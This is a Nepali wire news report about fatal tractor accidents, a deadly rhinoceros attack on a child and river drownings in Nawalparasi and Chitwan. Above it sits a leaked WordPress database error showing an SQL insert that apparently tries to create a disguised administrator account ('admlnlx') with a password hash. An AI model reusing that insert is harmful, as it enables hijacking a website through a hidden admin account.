WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfIlik97Nk2Rlrhw0ppYA3TwhFkECr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:47:24', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस १० –
यहाँ भएका दुई छुट्टाछुट्टै दुर्घटनामा तीन जनाको मृत्यु भएको छ ।
शनिबार साँझ बेनीमणिपुर–८ भित्री सडकखण्डमा उत्तरदेखि दक्षिण आउँदै गरेको लु२त ६१६६ नंको ट्र्याक्टर अनियन्त्रित भई पल्टँदा ट्र्याक्टरमा सवार १४ वर्षीय होमबहादुर रानाको मृत्यु भएको इलाका प्रहरी दुम्किबासले जनाएको छ ।
त्यसैगरी राकाचुली–९ स्थित चन्दातारा पहाडी सडकखण्डमा लु२त ५४०३ नंको ट्र्याक्टरमा सवार ५५ वर्षीय हुमबहादुर लामिछानेको सोही ट्र्याक्टरले थिचेर मृत्यु भएको छ । उनी ट्र्याक्टरबाट खसेको र ट्र्याक्टरको पछाडिको पाङ्ग्राले थिचेकाले उपचारका लागि लैजाँदै गर्दा बाटामै मृत्यु भएको इप्रका, दुम्किबासले जनाएको छ ।
गँैडाको आक्रमणबाट मृत्यु
जङ्गली गैँडाको आक्रमणबाट आज नवलपरासीमा एक बालिकाको मृत्यु भएको छ भने एक महिला घाइते भएकी छन् । कावासोती– १५ शेरवानकी बुद्धिकुमारी महतोका घरमा खेल्दै गरेकी तीन वर्षीया उनकी नातिनी श्वेताको जङ्गली गैँडाको आक्रमणबाट मृत्यु भएको हो ।
घरको आँगनमा आगो तापिरहेको बेला जङ्गली गैँडा आई नातिनी र हजुरआमा दुवैलाई आक्रमण गरेको थियो । घाइते बुद्धिकुमारीको पुरानो मेडिकल कलेज भरतपुर चितवनमा उपचार भइरहेको छ ।
यसैबीच चितवनको राप्ती नदीमा पौडी खेल्ने क्रममा डुबेर बेपत्ता भएका चितवन खैरहनीका १८ वर्षीय प्रवीण रोइलाको शव आज फेला परेको छ । स्थानीयवासीको सहयोगमा सशस्त्र प्रहरी र नेपाल प्रहरीको टोलीले शव पानीभित्र फेला पारेको हो । शनिबार नै कविलास– १ जुगेडीस्थित नारायणी नदीमा नुहाउन गएका नमस्ते नेपाल होटल जुगेडीमा काम गर्ने १९ वर्षीय इमान लामाको अवस्था भने अझै थाहा हुन नसकेको प्रहरी उपरीक्षक दीपक थापाले जानकारी दिनुभयो । – रासस